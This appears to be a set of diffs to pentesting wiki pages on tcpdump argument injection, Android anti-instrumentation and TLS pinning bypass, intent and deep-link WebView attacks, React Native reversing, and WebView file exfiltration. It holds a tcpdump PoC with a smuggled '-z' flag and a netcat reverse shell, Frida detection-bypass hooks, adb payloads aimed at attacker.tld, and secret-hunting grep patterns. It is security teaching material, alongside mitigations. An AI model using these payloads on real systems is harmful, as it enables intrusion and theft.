- [Practical Guide to IPv6 Attacks in a Local Network](https://habr.com/ru/articles/930526/)
- [FiberGateway GR241AG Full Exploit Chain](https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -120,6 +120,52 @@ These primitives are less common than the *tar/rsync/zip* classics but worth che
---
## tcpdump rotation hooks (-G/-W/-z): RCE via argv injection in wrappers
When a restricted shell or vendor wrapper builds a `tcpdump` command line by concatenating user-controlled fields (e.g., a "file name" parameter) without strict quoting/validation, you can smuggle extra `tcpdump` flags. The combo of `-G` (time-based rotation), `-W` (limit number of files), and `-z <cmd>` (post-rotate command) yields arbitrary command execution as the user running tcpdump (often root on appliances).
Preconditions:
- You can influence `argv` passed to `tcpdump` (e.g., via a wrapper like `/debug/tcpdump --filter=... --file-name=<HERE>`).
- The wrapper does not sanitize spaces or `-`-prefixed tokens in the file name field.
Classic PoC (executes a reverse shell script from a writable path):
```sh
# Reverse shell payload saved on the device (e.g., USB, tmpfs)
cat > /mnt/disk1_1/rce.sh <<'EOF'
#!/bin/sh
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f
EOF
chmod +x /mnt/disk1_1/rce.sh
# Inject additional tcpdump flags via the unsafe "file name" field
/debug/tcpdump --filter="udp port 1234" \
--file-name="test -i any -W 1 -G 1 -z /mnt/disk1_1/rce.sh"
# On the attacker host
nc -6 -lvnp 4444 &
# Then send any packet that matches the BPF to force a rotation
printf x | nc -u -6 [victim_ipv6] 1234
```
Details:
- `-G 1 -W 1` forces an immediate rotate after the first matching packet.
- `-z <cmd>` runs the post-rotate command once per rotation. Many builds execute `<cmd> <savefile>`. If `<cmd>` is a script/interpreter, ensure the argument handling matches your payload.
No-removable-media variants:
- If you have any other primitive to write files (e.g., a separate command wrapper that allows output redirection), drop your script into a known path and trigger `-z /bin/sh /path/script.sh` or `-z /path/script.sh` depending on platform semantics.
- Some vendor wrappers rotate to attacker-controllable locations. If you can influence the rotated path (symlink/directory traversal), you can steer `-z` to execute content you fully control without external media.
Hardening tips for vendors:
- Never pass user-controlled strings directly to `tcpdump` (or any tool) without strict allowlists. Quote and validate.
- Do not expose `-z` functionality in wrappers; run tcpdump with a fixed safe template and disallow extra flags entirely.
- Drop tcpdump privileges (cap_net_admin/cap_net_raw only) or run under a dedicated unprivileged user with AppArmor/SELinux confinement.
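A minimal sketch of the fixed-template approach (paths and the character allowlist are illustrative, not from any specific vendor):
```sh
#!/bin/sh
# Safer capture wrapper: the user controls only a validated basename, never raw argv
set -eu
name="${1:-}"
case "$name" in
  *[!A-Za-z0-9_.-]*|"") echo "invalid capture name" >&2; exit 1 ;;
esac
# Fixed template: no -z, no rotation knobs, bounded capture
exec tcpdump -i any -c 1000 -w "/var/captures/${name}.pcap"
```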
## Detection & Hardening
1. **Disable shell globbing** in critical scripts: `set -f` (`set -o noglob`) prevents wildcard expansion.
@ -134,5 +180,7 @@ These primitives are less common than the *tar/rsync/zip* classics but worth che
* Elastic Security Potential Shell via Wildcard Injection Detected rule (last updated 2025)
* Rutger Flohil “macOS — Tar wildcard injection” (Dec 18 2024)
* GTFOBins [tcpdump](https://gtfobins.github.io/gtfobins/tcpdump/)
* FiberGateway GR241AG [Full Exploit Chain](https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -470,6 +470,12 @@ If you want to pentest Android applications you need to know how to use Frida.
- You can find some Awesome Frida scripts here: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
- Try to bypass anti-debugging / anti-Frida mechanisms by loading Frida as indicated in [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) (tool [linjector](https://github.com/erfur/linjector-rs))
#### Anti-instrumentation & SSL pinning bypass workflow
{{#ref}}
android-anti-instrumentation-and-ssl-pinning-bypass.md
{{#endref}}
### **Dump Memory - Fridump**
Check if the application is storing sensitive information inside the memory that it shouldn't be storing like passwords or mnemonics.

View File

@ -0,0 +1,227 @@
# Android Anti-Instrumentation & SSL Pinning Bypass (Frida/Objection)
{{#include ../../banners/hacktricks-training.md}}
This page provides a practical workflow to regain dynamic analysis against Android apps that detect or block root/instrumentation, or that enforce TLS pinning. It focuses on fast triage, common detections, and copy‑pasteable hooks/tactics to bypass them without repacking when possible.
## Detection Surface (what apps check)
- Root checks: su binary, Magisk paths, getprop values, common root packages
- Frida/debugger checks (Java): Debug.isDebuggerConnected(), ActivityManager.getRunningAppProcesses(), getRunningServices(), scanning /proc, classpath, loaded libs
- Native antidebug: ptrace(), syscalls, antiattach, breakpoints, inline hooks
- Early init checks: Application.onCreate() or process start hooks that crash if instrumentation is present
- TLS pinning: custom TrustManager/HostnameVerifier, OkHttp CertificatePinner, Conscrypt pinning, native pins
## Step 1 — Quick win: hide root with Magisk DenyList
- Enable Zygisk in Magisk
- Enable DenyList, add the target package
- Reboot and retest
Many apps only look for obvious indicators (su/Magisk paths/getprop). DenyList often neutralizes naive checks.
References:
- Magisk (Zygisk & DenyList): https://github.com/topjohnwu/Magisk
## Step 2 — 30second Frida Codeshare tests
Try common dropin scripts before deep diving:
- anti-root-bypass.js
- anti-frida-detection.js
- hide_frida_gum.js
Example:
```bash
frida -U -f com.example.app -l anti-frida-detection.js
```
These typically stub Java root/debug checks, process/service scans, and native ptrace(). Useful on lightly protected apps; hardened targets may need tailored hooks.
- Codeshare: https://codeshare.frida.re/
## Step 3 — Bypass init-time detectors by attaching late
Many detections only run during process spawn/onCreate(). Spawntime injection (-f) or gadgets get caught; attaching after UI loads can slip past.
```bash
# Launch the app normally (launcher/adb), wait for UI, then attach
frida -U -n com.example.app
# Or with Objection to attach to running process
objection --gadget com.example.app explore   # if using gadget
```
If this works, keep the session stable and proceed to map and stub checks.
## Step 4 — Map detection logic via Jadx and string hunting
Static triage keywords in Jadx:
- "frida", "gum", "root", "magisk", "ptrace", "su", "getprop", "debugger"
Typical Java patterns:
```java
public boolean isFridaDetected() {
return getRunningServices().contains("frida");
}
```
Common APIs to review/hook:
- android.os.Debug.isDebuggerConnected
- android.app.ActivityManager.getRunningAppProcesses / getRunningServices
- java.lang.System.loadLibrary / System.load (native bridge)
- java.lang.Runtime.exec / ProcessBuilder (probing commands)
- android.os.SystemProperties.get (root/emulator heuristics)
## Step 5 — Runtime stubbing with Frida (Java)
Override custom guards to return safe values without repacking:
```js
Java.perform(() => {
const Checks = Java.use('com.example.security.Checks');
Checks.isFridaDetected.implementation = function () { return false; };
// Neutralize debugger checks
const Debug = Java.use('android.os.Debug');
Debug.isDebuggerConnected.implementation = function () { return false; };
// Example: kill ActivityManager scans (wrap the Java type; bare java.util.* is not defined in Frida's JS runtime)
const AM = Java.use('android.app.ActivityManager');
const Collections = Java.use('java.util.Collections');
AM.getRunningAppProcesses.implementation = function () { return Collections.emptyList(); };
});
```
Triaging early crashes? Dump classes just before it dies to spot likely detection namespaces:
```js
Java.perform(() => {
Java.enumerateLoadedClasses({
onMatch: n => console.log(n),
onComplete: () => console.log('Done')
});
});
```
Log and neuter suspicious methods to confirm execution flow:
```js
Java.perform(() => {
const Det = Java.use('com.example.security.DetectionManager');
Det.checkFrida.implementation = function () {
console.log('checkFrida() called');
return false;
};
});
```
## Step 6 — Follow the JNI/native trail when Java hooks fail
Trace JNI entry points to locate native loaders and detection init:
```bash
frida-trace -n com.example.app -i "JNI_OnLoad"
```
Quick native triage of bundled .so files:
```bash
# List exported symbols & JNI
nm -D libfoo.so | head
objdump -T libfoo.so | grep Java_
strings -n 6 libfoo.so | egrep -i 'frida|ptrace|gum|magisk|su|root'
```
Interactive/native reversing:
- Ghidra: https://ghidra-sre.org/
- r2frida: https://github.com/nowsecure/r2frida
Example: neuter ptrace to defeat simple antidebug in libc:
```js
const ptrace = Module.findExportByName(null, 'ptrace');
if (ptrace) {
Interceptor.replace(ptrace, new NativeCallback(function () {
return -1; // pretend failure
}, 'int', ['int', 'int', 'pointer', 'pointer']));
}
```
See also: {{#ref}}
reversing-native-libraries.md
{{#endref}}
## Step 7 — Objection patching (embed gadget / strip basics)
When you prefer repacking to runtime hooks, try:
```bash
objection patchapk --source app.apk
```
Notes:
- Requires apktool; ensure a current version from the official guide to avoid build issues: https://apktool.org/docs/install
- Gadget injection enables instrumentation without root but can still be caught by stronger inittime checks.
References:
- Objection: https://github.com/sensepost/objection
## Step 8 — Fallback: Patch TLS pinning for network visibility
If instrumentation is blocked, you can still inspect traffic by removing pinning statically:
```bash
apk-mitm app.apk
# Then install the patched APK and proxy via Burp/mitmproxy
```
- Tool: https://github.com/shroudedcode/apk-mitm
- For network config CAtrust tricks (and Android 7+ user CA trust), see:
{{#ref}}
make-apk-accept-ca-certificate.md
{{#endref}}
{{#ref}}
install-burp-certificate.md
{{#endref}}
## Handy command cheatsheet
```bash
# List processes and attach
frida-ps -Uai
frida -U -n com.example.app
# Spawn with a script (may trigger detectors)
frida -U -f com.example.app -l anti-frida-detection.js
# Trace native init
frida-trace -n com.example.app -i "JNI_OnLoad"
# Objection runtime
objection --gadget com.example.app explore
# Static TLS pinning removal
apk-mitm app.apk
```
## Tips & caveats
- Prefer attaching late over spawning when apps crash at launch
- Some detections rerun in critical flows (e.g., payment, auth) — keep hooks active during navigation
- Mix static and dynamic: string hunt in Jadx to shortlist classes; then hook methods to verify at runtime
- Hardened apps may use packers and native TLS pinning — expect to reverse native code
## References
- [Reversing Android Apps: Bypassing Detection Like a Pro](https://www.kayssel.com/newsletter/issue-12/)
- [Frida Codeshare](https://codeshare.frida.re/)
- [Objection](https://github.com/sensepost/objection)
- [apk-mitm](https://github.com/shroudedcode/apk-mitm)
- [Jadx](https://github.com/skylot/jadx)
- [Ghidra](https://ghidra-sre.org/)
- [r2frida](https://github.com/nowsecure/r2frida)
- [Apktool install guide](https://apktool.org/docs/install)
- [Magisk](https://github.com/topjohnwu/Magisk)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -2,9 +2,67 @@
{{#include ../../banners/hacktricks-training.md}}
**Take a look at: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**
Intent injection abuses components that accept attacker-controlled Intents or data that is later converted into Intents. Two very common patterns during Android app pentests are:
- Passing crafted extras to exported Activities/Services/BroadcastReceivers that are later forwarded to privileged, non-exported components.
- Triggering exported VIEW/BROWSABLE deep links that forward attacker-controlled URLs into internal WebViews or other sensitive sinks.
## Deep links → WebView sink (URL parameter injection)
If an app exposes a custom scheme deep link such as:
```text
myscheme://com.example.app/web?url=<attacker_url>
```
and the receiving Activity forwards the `url` query parameter into a WebView, you can force the app to render arbitrary remote content in its own WebView context.
PoC via adb:
```bash
# Implicit VIEW intent
adb shell am start -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
# Or explicitly target an Activity
adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
```
Impact
- HTML/JS executes inside the app's WebView profile.
- If JavaScript is enabled (by default or due to misordered checks), you can enumerate/use any exposed `@JavascriptInterface` objects, steal WebView cookies/local storage, and pivot.
See also:
{{#ref}}
webview-attacks.md
{{#endref}}
## Order-of-checks bug enabling JavaScript
A recurring bug is enabling JavaScript (or other permissive WebView settings) before the final URL allowlist/verification finishes. If early helpers accept your deep link and the WebView is configured first, your final load happens with JavaScript already enabled even if later checks are flawed or too late.
What to look for in decompiled code:
- Multiple helpers that parse/split/rebuild the URL differently (inconsistent normalization).
- Calls to `getSettings().setJavaScriptEnabled(true)` before the last host/path allowlist check.
- A pipeline like: parse → partial validate → configure WebView → final verify → loadUrl.
Mitigations
- Canonicalize once and validate strictly; fail closed.
- Only enable JavaScript after all checks pass and just before loading trusted content.
- Avoid exposing bridges to untrusted origins.
## Other classic Intent injection primitives
- startActivity/sendBroadcast using attacker-supplied `Intent` extras that are later re-parsed (`Intent.parseUri(...)`) and executed.
- Exported proxy components that forward Intents to non-exported sensitive components without permission checks.
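A hypothetical PoC for the second pattern (component and extra names are made up; it assumes the proxy calls `Intent.parseUri()` on the extra and starts the result):
```bash
# Deliver an intent: URI via an extra that an exported proxy re-parses and launches
adb shell am start -n com.example.app/.ProxyActivity \
  --es redirect_url "intent:#Intent;component=com.example.app/.InternalAdminActivity;end"
```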
## References
- [Android Access to app-protected components](https://blog.oversecured.com/Android-Access-to-app-protected-components/)
- [Samsung S24 Exploit Chain Pwn2Own 2024 Walkthrough](https://medium.com/@happyjester80/samsung-s24-exploit-chain-pwn2own-2024-walkthrough-c7a3da9a7a26)
- [Pwn2Own Ireland 2024 Samsung S24 attack chain (whitepaper)](https://maliciouserection.com/2025/05/13/pwn2own-ireland-2024-samsung-s24-attack-chain-whitepaper.html)
- [Demonstration video](https://www.youtube.com/watch?v=LAIr2laU-So)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -10,6 +10,22 @@ To confirm if the application was built on the React Native framework, follow th
3. Use the command `find . -print | grep -i ".bundle$"` to search for the JavaScript file.
Note: If you are given an Android App Bundle (.aab) instead of an APK, generate a universal APK first and then extract the bundle:
```bash
# Get bundletool.jar and generate a universal APK set
java -jar bundletool.jar build-apks \
--bundle=app-release.aab \
--output=app.apks \
--mode=universal \
--overwrite
# Extract the APK and then unzip it to find assets/index.android.bundle
unzip -p app.apks universal.apk > universal.apk
unzip -qq universal.apk -d ReactNative
ls ReactNative/assets/
```
## Javascript Code
If checking the contents of the `index.android.bundle` you find the JavaScript code of the application (even if minified), you can **analyze it to find sensitive information and vulnerabilities**.
@ -42,12 +58,37 @@ To search for sensitive credentials and endpoints, follow these steps:
3. It was fortunate that sensitive hard-coded credentials were found in the JavaScript code during the recon process.
### Quick secrets/endpoint hunting in bundles
These simple greps often surface interesting indicators even in minified JS:
```bash
# Common backends and crash reporters
strings -n 6 index.android.bundle | grep -Ei "(api\.|graphql|/v1/|/v2/|socket|wss://|sentry\.io|bugsnag|appcenter|codepush|firebaseio\.com|amplify|aws)"
# Firebase / Google keys (heuristics)
strings -n 6 index.android.bundle | grep -Ei "(AIza[0-9A-Za-z_-]{35}|AIzaSy[0-9A-Za-z_-]{33})"
# AWS access key id heuristic
strings -n 6 index.android.bundle | grep -E "AKIA[0-9A-Z]{16}"
# Expo/CodePush deployment keys
strings -n 6 index.android.bundle | grep -Ei "(CodePush|codepush:\\/\\/|DeploymentKey)"
# Sentry DSN
strings -n 6 index.android.bundle | grep -Ei "(Sentry\.init|dsn\s*:)"
```
If you suspect Over-The-Air update frameworks, also hunt for:
- Microsoft App Center / CodePush deployment keys
- Expo EAS Updates configuration (`expo-updates`, `expo\.io`, signing certs)
### Change JS code and rebuild
In this case changing the code is easy. You just need to rename the app to use the extension `.zip` and extract it. Then you can **modify the JS code inside this bundle and rebuild the app**. This should be enough to allow you to **inject code** in the app for testing purposes.
## Hermes bytecode
If the bundle contains **Hermes bytecode**, you **won't be able to access the Javascript code** of the app (not even to the minified version).
@ -58,35 +99,114 @@ file index.android.bundle
index.android.bundle: Hermes JavaScript bytecode, version 96
```
However, you can use the tools **[hbctool](https://github.com/bongtrop/hbctool)**, updated forks of hbctool that support newer bytecode versions, **[hasmer](https://github.com/lucasbaizer2/hasmer)**, **[hermes_rs](https://github.com/Pilfer/hermes_rs)** (Rust library/APIs), or **[hermes-dec](https://github.com/P1sec/hermes-dec)** to **disassemble the bytecode** and also to **decompile it to some pseudo JS code**. For example:
```bash
# Disassemble and re-assemble with hbctool (works only for supported HBC versions)
hbctool disasm ./index.android.bundle ./hasm_out
# ...edit ./hasm_out/**/*.hasm (e.g., change comparisons, constants, feature flags)...
hbctool asm ./hasm_out ./index.android.bundle
# Using hasmer (focus on disassembly; assembler/decompiler are WIP)
hasmer disasm ./index.android.bundle -o hasm_out
# Using hermes-dec to produce pseudo-JS
hbc-disassembler ./index.android.bundle /tmp/my_output_file.hasm
hbc-decompiler ./index.android.bundle /tmp/my_output_file.js
```
Tip: The open-source Hermes project also ships developer tools such as `hbcdump` in specific Hermes releases. If you build the matching Hermes version used to produce the bundle, `hbcdump` can dump functions, string tables, and bytecode for deeper analysis.
### Change code and rebuild (Hermes)
Ideally you should be able to modify the disassembled code (changing a comparison, a value, or whatever you need to modify), then **rebuild the bytecode** and rebuild the app.
- The original **[hbctool](https://github.com/bongtrop/hbctool)** supports disassembling the bundle and building it back after changes, but historically supported only older bytecode versions. Community-maintained forks extend support to newer Hermes versions (including mid-80s through 96) and are often the most practical option to patch modern RN apps.
- The tool **[hermes-dec](https://github.com/P1sec/hermes-dec)** does not support rebuilding the bytecode (decompiler/disassembler only), but it's very helpful to navigate logic and dump strings.
- The tool **[hasmer](https://github.com/lucasbaizer2/hasmer)** aims to support both disassembly and assembly for multiple Hermes versions; assembling is still maturing but worth trying on recent bytecode.
- The tool **[hermes_rs](https://github.com/Pilfer/hermes_rs)** supports rebuilding the bytecode, but it's a library with Rust APIs rather than a CLI tool.
A minimal workflow with hbctool-like assemblers:
```bash
# 1) Disassemble to HASM directories
hbctool disasm assets/index.android.bundle ./hasm
# 2) Edit a guard or feature flag (example: force boolean true)
# In the relevant .hasm, replace a LoadConstUInt8 0 with 1
# or change a conditional jump target to bypass a check.
# 3) Reassemble into a new bundle
hbctool asm ./hasm assets/index.android.bundle
# 4) Repack the APK and resign
zip -r ../patched.apk *
# Align/sign as usual (see Android signing section in HackTricks)
```
Note that Hermes bytecode format is versioned and the assembler must match the exact on-disk format. If you get format errors, switch to an updated fork/alternative or rebuild the matching Hermes tooling.
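To pick the right tool up front, check the bytecode version embedded in the header (an 8-byte magic followed by a little-endian u32 version; `file` usually decodes it for you):
```bash
file index.android.bundle        # e.g., "Hermes JavaScript bytecode, version 96"
xxd -l 12 index.android.bundle   # raw view: magic (8 bytes) then the version field
```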
## Dynamic Analysis
One way to dynamically analyze the app is to use Frida to enable the developer mode of the React app and then use **`react-native-debugger`** to attach to it. However, for this you apparently need the source code of the app. You can find more info about this in [https://newsroom.bedefended.com/hooking-react-native-applications-with-frida/](https://newsroom.bedefended.com/hooking-react-native-applications-with-frida/).
### Enabling Dev Support in release with Frida (caveats)
Some apps accidentally ship classes that make Dev Support togglable. If present, you can try forcing `getUseDeveloperSupport()` to return true:
```javascript
// frida -U -f com.target.app -l enable-dev.js
Java.perform(function(){
try {
var Host = Java.use('com.facebook.react.ReactNativeHost');
Host.getUseDeveloperSupport.implementation = function(){
return true; // force dev support
};
console.log('[+] Patched ReactNativeHost.getUseDeveloperSupport');
} catch (e) {
console.log('[-] Could not patch: ' + e);
}
});
```
Warning: In properly built release builds, `DevSupportManagerImpl` and related debug-only classes are stripped and flipping this flag can crash the app or have no effect. When this works, you can typically expose the dev menu and attach debuggers/inspectors.
### Network interception in RN apps
React Native Android typically relies on OkHttp under the hood (via the `Networking` native module). To intercept/observe traffic on a non-rooted device during dynamic tests:
- Use system proxy + trust user CA or use other generic Android TLS bypass techniques.
- RN-specific tip: if the app bundles Flipper in release by mistake (debug tooling), the Flipper Network plugin can expose requests/responses.
For generic Android interception and pinning bypass techniques refer to:
{{#ref}}
make-apk-accept-ca-certificate.md
{{#endref}}
{{#ref}}
frida-tutorial/objection-tutorial.md
{{#endref}}
## Recent issues in popular RN libraries (what to look for)
When auditing thirdparty modules visible in the JS bundle or native libs, check for known vulns and verify versions in `package.json`/`yarn.lock`.
- react-native-mmkv (Android): versions prior to 2.11.0 logged the optional encryption key to Android logs. If ADB/logcat is available, secrets could be recovered. Ensure >= 2.11.0. Indicators: usage of `react-native-mmkv`, log statements mentioning MMKV init with encryption. CVE-2024-21668.
- react-native-document-picker: versions < 9.1.1 were vulnerable to path traversal on Android (file selection), fixed in 9.1.1. Validate inputs and library version.
Quick checks:
```bash
grep -R "react-native-mmkv" -n {index.android.bundle,*.map} 2>/dev/null || true
grep -R "react-native-document-picker" -n {index.android.bundle,*.map} 2>/dev/null || true
# If you also have the node_modules (rare on release): grep -R in package.json / yarn.lock
```
## References
- [https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)
- [https://www.assetnote.io/resources/research/expanding-the-attack-surface-react-native-android-applications](https://www.assetnote.io/resources/research/expanding-the-attack-surface-react-native-android-applications)
- [https://payatu.com/wp-content/uploads/2023/02/Mastering-React-Native-Application-Pentesting-A-Practical-Guide-2.pdf](https://payatu.com/wp-content/uploads/2023/02/Mastering-React-Native-Application-Pentesting-A-Practical-Guide-2.pdf)
- CVE-2024-21668: react-native-mmkv logs encryption key on Android, fixed in v2.11.0 (NVD): https://nvd.nist.gov/vuln/detail/CVE-2024-21668
- hbctool (and forks) for Hermes assemble/disassemble: https://github.com/bongtrop/hbctool
{{#include ../../banners/hacktricks-training.md}}

View File

@ -136,15 +136,264 @@ xhr.open(
xhr.send(null)
```
# Webview Attacks
## Guide on WebView Configurations and Security
### Overview of WebView Vulnerabilities
A critical aspect of Android development involves the correct handling of WebViews. This guide highlights key configurations and security practices to mitigate risks associated with WebView usage.
![WebView Example](<../../images/image (1190).png>)
### **File Access in WebViews**
By default, WebViews permit file access. This functionality is controlled by the `setAllowFileAccess()` method, available since Android API level 3 (Cupcake 1.5). Applications with the **android.permission.READ_EXTERNAL_STORAGE** permission can read files from external storage using a file URL scheme (`file://path/to/file`).
#### **Deprecated Features: Universal and File Access From URLs**
- **Universal Access From File URLs**: This deprecated feature allowed cross-origin requests from file URLs, posing a significant security risk due to potential XSS attacks. The default setting is disabled (`false`) for apps targeting Android Jelly Bean and newer.
- To check this setting, use `getAllowUniversalAccessFromFileURLs()`.
- To modify this setting, use `setAllowUniversalAccessFromFileURLs(boolean)`.
- **File Access From File URLs**: This feature, also deprecated, controlled access to content from other file scheme URLs. Like universal access, its default is disabled for enhanced security.
- Use `getAllowFileAccessFromFileURLs()` to check and `setAllowFileAccessFromFileURLs(boolean)` to set.
#### **Secure File Loading**
For disabling file system access while still accessing assets and resources, the `setAllowFileAccess()` method is used. With Android R and above, the default setting is `false`.
- Check with `getAllowFileAccess()`.
- Enable or disable with `setAllowFileAccess(boolean)`.
#### **WebViewAssetLoader**
The **WebViewAssetLoader** class is the modern approach for loading local files. It uses http(s) URLs for accessing local assets and resources, aligning with the Same-Origin policy, thus facilitating CORS management.
### loadUrl
This is a common function used to load arbitrary URLs in a WebView:
```java
webview.loadUrl("<url here>")
```
Of course, a potential attacker should never be able to **control the URL** that an application is going to load.
### Deep-linking into internal WebView (custom scheme → WebView sink)
Many apps register custom schemes/paths that route a user-supplied URL into an in-app WebView. If the deep link is exported (VIEW + BROWSABLE), an attacker can force the app to render arbitrary remote content inside its WebView context.
Typical manifest pattern (simplified):
```xml
<activity android:name=".MainActivity" android:exported="true">
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data android:scheme="myscheme" android:host="com.example.app" />
</intent-filter>
</activity>
```
Common code flow (simplified):
```java
// Entry activity
@Override
protected void onNewIntent(Intent intent) {
Uri deeplink = intent.getData();
String url = deeplink.getQueryParameter("url"); // attacker-controlled
if (deeplink.getPathSegments().get(0).equals("web")) {
Intent i = new Intent(this, WebActivity.class);
i.putExtra("url", url);
startActivity(i);
}
}
// WebActivity sink
webView.loadUrl(getIntent().getStringExtra("url"));
```
Attack pattern and PoC via adb:
```bash
# Template force load in internal WebView
adb shell am start -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
# If a specific Activity must be targeted
adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
```
Impact: the remote page runs in the app's WebView context (cookies/session of the app's WebView profile, access to any exposed @JavascriptInterface, potential access to content:// and file:// depending on settings).
Hunting tips:
- Grep decompiled sources for `getQueryParameter("url")`, `loadUrl(`, `WebView` sinks, and deep-link handlers (`onCreate/onNewIntent`).
- Review the manifest for VIEW+BROWSABLE filters and custom schemes/hosts that map to activities that later start a WebView.
- Check if there are multiple deep-link paths (e.g., an “external browser” path vs. an “internal webview” path) and prefer the one that renders inside the app.
### Enabling JavaScript before verification (order-of-checks bug)
A frequent hardening mistake is enabling JavaScript or configuring relaxed WebView settings before the final allowlist/verification of the target URL completes. If the verification is inconsistent across helpers or happens too late, an attacker deep link can reach a state where:
1) WebView settings apply (e.g., `setJavaScriptEnabled(true)`), and
2) The untrusted URL is loaded with JavaScript enabled.
Bug pattern (pseudocode):
```java
// 1) Parse/early checks
Uri u = parse(intent);
if (!looksValid(u)) return;
// 2) Configure WebView BEFORE final checks
webView.getSettings().setJavaScriptEnabled(true); // BAD: too early
configureMixedContent();
// 3) Do final verification (late)
if (!finalAllowlist(u)) return; // too late: JS already enabled
// 4) Load
webView.loadUrl(u.toString());
```
Why it's exploitable
- Inconsistent normalization: helpers split/rebuild the URL differently than the final check, creating mismatches a malicious URL can exploit.
- Misordered pipeline: enabling JS in step 2 applies globally to the WebView instance, affecting the final load even if verification would later fail.
How to test
- Craft deep-link payloads that pass early checks and reach the WebView configuration site.
- Use adb to fire implicit VIEW intents delivering a `url=` parameter controlled by you:
```bash
adb shell am start -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
```
If exploitation succeeds, your payload executes JavaScript in the app's WebView. From there, probe for exposed bridges:
```html
<script>
for (let k in window) {
try { if (typeof window[k] === 'object' || typeof window[k] === 'function') console.log('[JSI]', k); } catch(e){}
}
</script>
```
Defensive guidance
- Canonicalize once; validate strictly against a single source of truth (scheme/host/path/query).
- Only call `setJavaScriptEnabled(true)` after all allowlist checks pass and just before loading trusted content.
- Avoid exposing `@JavascriptInterface` to untrusted origins; prefer per-origin gating.
- Consider per-WebView instances for trusted vs untrusted content, with JS disabled by default.
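A minimal sketch of the safe ordering (the `ALLOWED_HOSTS` allowlist and surrounding Activity code are illustrative, not from any specific app):
```java
// Validate first against a single canonical source of truth, then configure, then load
String raw = getIntent().getStringExtra("url");
Uri u = (raw == null) ? null : Uri.parse(raw);
boolean trusted = u != null && "https".equals(u.getScheme()) && ALLOWED_HOSTS.contains(u.getHost());
if (!trusted) { finish(); return; }   // fail closed before touching WebView settings
WebSettings s = webView.getSettings();
s.setJavaScriptEnabled(true);         // only after every check has passed
s.setAllowFileAccess(false);
webView.loadUrl(u.toString());
```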
### **JavaScript and Intent Scheme Handling**
- **JavaScript**: Disabled by default in WebViews, it can be enabled via `setJavaScriptEnabled()`. Caution is advised as enabling JavaScript without proper safeguards can introduce security vulnerabilities.
- **Intent Scheme**: WebViews can handle the `intent` scheme, potentially leading to exploits if not carefully managed. An example vulnerability involved an exposed WebView parameter "support_url" that could be exploited to execute cross-site scripting (XSS) attacks.
![Vulnerable WebView](<../../images/image (1191).png>)
Exploitation example using adb:
```bash
adb.exe shell am start -n com.tmh.vulnwebview/.SupportWebView es support_url "https://example.com/xss.html"
```
### Javascript Bridge
A feature is provided by Android that enables **JavaScript** in a WebView to invoke **native Android app functions**. This is achieved by utilizing the `addJavascriptInterface` method, which integrates JavaScript with native Android functionalities, termed as a _WebView JavaScript bridge_. Caution is advised as this method allows all pages within the WebView to access the registered JavaScript Interface object, posing a security risk if sensitive information is exposed through these interfaces.
- **Extreme caution is required** for apps targeting Android versions below 4.2 due to a vulnerability allowing remote code execution through malicious JavaScript, exploiting reflection.
#### Implementing a JavaScript Bridge
- **JavaScript interfaces** can interact with native code, as shown in the examples where a class method is exposed to JavaScript:
```java
@JavascriptInterface
public String getSecret() {
    return "SuperSecretPassword";
}
```
- JavaScript Bridge is enabled by adding an interface to the WebView:
```java
webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge");
webView.reload();
```
- Potential exploitation through JavaScript, for instance, via an XSS attack, enables the calling of exposed Java methods:
```html
<script>
alert(javascriptBridge.getSecret())
</script>
```
- To mitigate risks, **restrict JavaScript bridge usage** to code shipped with the APK and prevent loading JavaScript from remote sources. For older devices, set the minimum API level to 17.
### Reflection-based Remote Code Execution (RCE)
- A documented method allows achieving RCE through reflection by executing a specific payload. However, the `@JavascriptInterface` annotation prevents unauthorized method access, limiting the attack surface.
### Remote Debugging
- **Remote debugging** is possible with **Chrome Developer Tools**, enabling interaction and arbitrary JavaScript execution within the WebView content.
#### Enabling Remote Debugging
- Remote debugging can be enabled for all WebViews within an application by:
```java
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
WebView.setWebContentsDebuggingEnabled(true);
}
```
- To conditionally enable debugging based on the application's debuggable state:
```java
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE))
{ WebView.setWebContentsDebuggingEnabled(true); }
}
```
## Exfiltrate arbitrary files
- Demonstrates the exfiltration of arbitrary files using an XMLHttpRequest:
```javascript
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
alert(xhr.responseText)
}
}
xhr.open(
"GET",
"file:///data/data/com.authenticationfailure.wheresmybrowser/databases/super_secret.db",
true
)
xhr.send(null)
```
## References
- [Review of Android WebViews file access attack vectors](https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html)
- [WheresMyBrowser.Android (demo app)](https://github.com/authenticationfailure/WheresMyBrowser.Android)
- [Android WebView reference](https://developer.android.com/reference/android/webkit/WebView)
